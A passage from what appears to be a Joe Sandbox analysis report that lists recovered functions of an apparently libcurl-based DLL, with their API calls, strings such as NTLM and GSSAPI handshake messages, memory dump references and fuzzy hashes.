                                                                                                                                            • htonl.WS2_32(?), ref: 6B7B6626
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Strings
                                                                                                                                            • GSSAPI handshake failure (invalid security layer), xrefs: 6B7B65BA
                                                                                                                                            • GSSAPI handshake failure (empty security message), xrefs: 6B7B6561, 6B7B681F
                                                                                                                                            • GSSAPI handshake failure (invalid security data), xrefs: 6B7B6583
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                            • API String ID: 3222853418-242323837
                                                                                                                                            • Opcode ID: 6b694b76c8dcb425bb47cbc9870b7c39d0a12ae1cbc8ac40e51684b3bf480219
                                                                                                                                            • Instruction ID: 5268507e727df3323def416979213a266f0571aa344ce7ff687b33a661d55486
                                                                                                                                            • Opcode Fuzzy Hash: 6b694b76c8dcb425bb47cbc9870b7c39d0a12ae1cbc8ac40e51684b3bf480219
                                                                                                                                            • Instruction Fuzzy Hash: 0BD138B5D00218ABCF10DFA8D945A9DBBB8FF09315F1040A9F919A7211DB39DA15CF64
                                                                                                                                            Function 6B7795D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 253COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ../$/..$/../$/./
                                                                                                                                            • API String ID: 0-456519384
                                                                                                                                            • Opcode ID: d7748a70ac9b3b35631815c0921859b3fbd8d5d95d78b9e653ce7281e4740972
                                                                                                                                            • Instruction ID: 5d99b5a72ad7cf9f79262d3c6f76ed874835347a1b0997c895adfb44304dbbc2
                                                                                                                                            • Opcode Fuzzy Hash: d7748a70ac9b3b35631815c0921859b3fbd8d5d95d78b9e653ce7281e4740972
                                                                                                                                            • Instruction Fuzzy Hash: FB711965E0A181BADF216E385B9576A7FB79B73248F9801F9F885CB203F61BC405C391
                                                                                                                                            Function 6B7762C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 199COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B776449
                                                                                                                                            • curl_slist_free_all.LIBCURL(?), ref: 6B7764F5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                                            • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                                            • API String ID: 2653667558-4095489131
                                                                                                                                            • Opcode ID: 54a122db1c9ea13adbbea8c671ab405471877bb8d5562cc00d325df7b009827d
                                                                                                                                            • Instruction ID: 61c8ed0ea6a07f0d58efc02841d5b094a297c13f49676cbcc56ea31137b958e7
                                                                                                                                            • Opcode Fuzzy Hash: 54a122db1c9ea13adbbea8c671ab405471877bb8d5562cc00d325df7b009827d
                                                                                                                                            • Instruction Fuzzy Hash: A761F0B0D04340ABEF216F649A46BAE7BB45F16708F0840F4FD496B246E77AD705C7A2
                                                                                                                                            Function 6B78E0E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 179COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B78E253
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                                            • API String ID: 3307269620-3667642693
                                                                                                                                            • Opcode ID: 3778bb3fe80edc334eab463904a6ce87de3f1489cb32c30876b4e100d551c058
                                                                                                                                            • Instruction ID: 2f24ecb69665792471c4d7013136737a5fbf2625c235ce14f0f867df7be95794
                                                                                                                                            • Opcode Fuzzy Hash: 3778bb3fe80edc334eab463904a6ce87de3f1489cb32c30876b4e100d551c058
                                                                                                                                            • Instruction Fuzzy Hash: C7711975A00209EFDB11CFA8D941BAEBBF5EB49345F0041A9E914E7240D779AE50DF90
                                                                                                                                            Function 6B78DFD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(NTLM,6B78B6E6,00000004,00000DD0,?,?,?,6B78B6E6,?,?,?,?,?,?,00000000,?), ref: 6B78E00B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
                                                                                                                                            • API String ID: 482932555-2258391893
                                                                                                                                            • Opcode ID: 87cfc483519fbd0570a67c32606b7c1c82c5cc05f57a544f5adaf470a850efff
                                                                                                                                            • Instruction ID: 7bbf83577bb33d1eaf831590077554b630e3887310f2207629a48190edb22aff
                                                                                                                                            • Opcode Fuzzy Hash: 87cfc483519fbd0570a67c32606b7c1c82c5cc05f57a544f5adaf470a850efff
                                                                                                                                            • Instruction Fuzzy Hash: 61210A76A102096BEB115F74FE45B9EBBA8DF41368F204872FD58C7112E73BD6248B60
                                                                                                                                            Function 6B7A06B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: $lyk$...$...
                                                                                                                                            • API String ID: 4251218765-3253439172
                                                                                                                                            • Opcode ID: f0eb7700f32327e6b389b4a190cd4fd081a1b2d2d889e08dab267ba7878e49b3
                                                                                                                                            • Instruction ID: b16915937defa7779eede761714bb22399735ba3f39994601d9727a0c8399b1c
                                                                                                                                            • Opcode Fuzzy Hash: f0eb7700f32327e6b389b4a190cd4fd081a1b2d2d889e08dab267ba7878e49b3
                                                                                                                                            • Instruction Fuzzy Hash: 04113379900208AADF44CE24ED45BFD73B8EB02308F0086E9F89067141DA3AB74ACBD1
                                                                                                                                            Function 6B7BDA40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B7BCB27,00000000,6B78692E), ref: 6B7BDA73
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_getenv
                                                                                                                                            • String ID: CURL_SSL_BACKEND$Pf~kPf~k
                                                                                                                                            • API String ID: 2452071183-429030350
                                                                                                                                            • Opcode ID: 7a22ae839e6bf6c252d87a5a55677780aeebeeb23aadc55e1e37be7504ddfb7e
                                                                                                                                            • Instruction ID: a5fd5d60b53f1b9800137877405ff6d9e8bcc62da411f7da56e51f54840c269b
                                                                                                                                            • Opcode Fuzzy Hash: 7a22ae839e6bf6c252d87a5a55677780aeebeeb23aadc55e1e37be7504ddfb7e
                                                                                                                                            • Instruction Fuzzy Hash: 5601D6336481418BDF049FB4BA11B2A37ACAB82759F450479F819C3620F739DA82CB99
                                                                                                                                            Function 6B7CC4C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B7CC475,?,?,6B7CC43D,?,00000000,?), ref: 6B7CC4D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B7CC4EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,6B7CC475,?,?,6B7CC43D,?,00000000,?), ref: 6B7CC50E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: 3e34e2bd24f43045c8fe0a873d01c6058f6fb5a508653994d2912adb64a5019e
                                                                                                                                            • Instruction ID: 1bec4f62e54149afd035365735c9d07d6a323db05bf84be9da08262b1b8a8afc
                                                                                                                                            • Opcode Fuzzy Hash: 3e34e2bd24f43045c8fe0a873d01c6058f6fb5a508653994d2912adb64a5019e
                                                                                                                                            • Instruction Fuzzy Hash: AAF01232500118FFDF019B61DA09B9F7B64EF41796F204078B921A1251DB35DF01DAA1
                                                                                                                                            Function 6B7D5E4D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E65
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E77
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E89
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E9B
                                                                                                                                            • _free.LIBCMT ref: 6B7D5EAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: ff4544c9ffe8682fb77584bc762aefe838832ba23c25e2e2a0e8c2184f32c890
                                                                                                                                            • Instruction ID: f2808154d3381cee974cc81bae9dca6318daf946d3f46ab0c3c94ef385502820
                                                                                                                                            • Opcode Fuzzy Hash: ff4544c9ffe8682fb77584bc762aefe838832ba23c25e2e2a0e8c2184f32c890
                                                                                                                                            • Instruction Fuzzy Hash: BBF014715046449F8B18AB78F2D6D1F77EDBA023943A0086EF528DF500DB38F8808AA8
                                                                                                                                            Function 6B775C60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 335COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B776970: inet_pton.WS2_32(00000002,?,?), ref: 6B77699A
                                                                                                                                              • Part of subcall function 6B776970: inet_pton.WS2_32(00000017,?,?), ref: 6B7769AB
                                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B775CC3
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B775CD2
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B775D8E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: inet_pton$___from_strstr_to_strchr
                                                                                                                                            • String ID: /
                                                                                                                                            • API String ID: 1475684856-2043925204
                                                                                                                                            • Opcode ID: 84e90c344b99c9a6646881d2e0889101c72b37d3f279f92b4dc608410d762898
                                                                                                                                            • Instruction ID: 52e20441da2079b020ebbbfa813254418baece384d2a0384bd0296af3f67857f
                                                                                                                                            • Opcode Fuzzy Hash: 84e90c344b99c9a6646881d2e0889101c72b37d3f279f92b4dc608410d762898
                                                                                                                                            • Instruction Fuzzy Hash: 10C1C0B0A006469BDF21AF78AA44BAEB7F8EF05204F0401B8FD55E7641E739E514CBA1
                                                                                                                                            Function 6B7CD007 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,8hwk,?,6B7CCF35,8hwk,6B7EE6B8,0000000C,6B7CCFE7,6B7EE430), ref: 6B7CD05D
                                                                                                                                            • GetLastError.KERNEL32(?,6B7CCF35,8hwk,6B7EE6B8,0000000C,6B7CCFE7,6B7EE430), ref: 6B7CD067
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD092
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                            • String ID: 8hwk
                                                                                                                                            • API String ID: 2583163307-3892429355
                                                                                                                                            • Opcode ID: 1364193ef2f49144a2c329ac45884ba12b7e1fb1e56850a068cbd6b5acb401a6
                                                                                                                                            • Instruction ID: 6dc91bad12bfa0c782db6d01ce09fda76b7b5956e6579712685d26f2135aa367
                                                                                                                                            • Opcode Fuzzy Hash: 1364193ef2f49144a2c329ac45884ba12b7e1fb1e56850a068cbd6b5acb401a6
                                                                                                                                            • Instruction Fuzzy Hash: EB016B32AC51782ED660127C970D72F27994B83BB4F2201BDF824872C1EB6CC8C2815A
                                                                                                                                            Function 6B7790C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7AACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B7AAEAE), ref: 6B7AACCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B7790FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                            • API String ID: 1646373207-3788156360
                                                                                                                                            • Opcode ID: 9bfb646b8bd6c831f79d99b716b235919117142130316f9a324a88a237e57595
                                                                                                                                            • Instruction ID: 44d71bed1daa6cdd8ba7783956dea13a266c0f2101c24d178f97fc4759cf6778
                                                                                                                                            • Opcode Fuzzy Hash: 9bfb646b8bd6c831f79d99b716b235919117142130316f9a324a88a237e57595
                                                                                                                                            • Instruction Fuzzy Hash: 26F065B0751242BAEF142A354E1F75A36596751784F8088F8B914D62C3EF3CD500DA11
                                                                                                                                            Function 6B7CA96C Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a125b87b405b02cb5e0d99bdcf2bc33755ff9ea7a85245581d74c0a1072cb1df
                                                                                                                                            • Instruction ID: 25d65ba4f7cbd29b50eaab0b0157149bd0ad9356b7e9193a42d9533adf4f80df
                                                                                                                                            • Opcode Fuzzy Hash: a125b87b405b02cb5e0d99bdcf2bc33755ff9ea7a85245581d74c0a1072cb1df
                                                                                                                                            • Instruction Fuzzy Hash: 3A41F571A44344AFD7148F38CE46B9FBBB9EB88711F10857EF015DB680D37899408B91
                                                                                                                                            Function 6B7D4DB7 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D4E87
                                                                                                                                            • _free.LIBCMT ref: 6B7D4EB0
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,6B7CD700,00000000,?,?,?,?,?,?,?,?,6B7CD700,?,00000000), ref: 6B7D4EE2
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6B7CD700,?,00000000,?,?,?,?,00000000,?), ref: 6B7D4EFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            • Opcode ID: 722f2cab3717f24de75aecf851f13c1634b3715e006dae9a648caf0f5b0ddd5a
                                                                                                                                            • Instruction ID: 7d8479bf699b5bb5e4fec982c6cea3e3be3a82c5d591426a24a976caf56f76e3
                                                                                                                                            • Opcode Fuzzy Hash: 722f2cab3717f24de75aecf851f13c1634b3715e006dae9a648caf0f5b0ddd5a
                                                                                                                                            • Instruction Fuzzy Hash: 4E41E932900645BFDB118FB4CF4AB8E77B9AF893A4F140569F428A7290E73CDA415761
                                                                                                                                            Function 6B7CF53B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B7C37F2,?,00000000,00000000,?,6B7C84AA,6B7C8987,00000000,?,00000000), ref: 6B7CF540
                                                                                                                                            • _free.LIBCMT ref: 6B7CF59D
                                                                                                                                            • _free.LIBCMT ref: 6B7CF5D3
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B7C84AA,6B7C8987,00000000,?,00000000), ref: 6B7CF5DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: 6e8d5e137584c381e20ea9706880095b876283494e3447111605740a7aef6abd
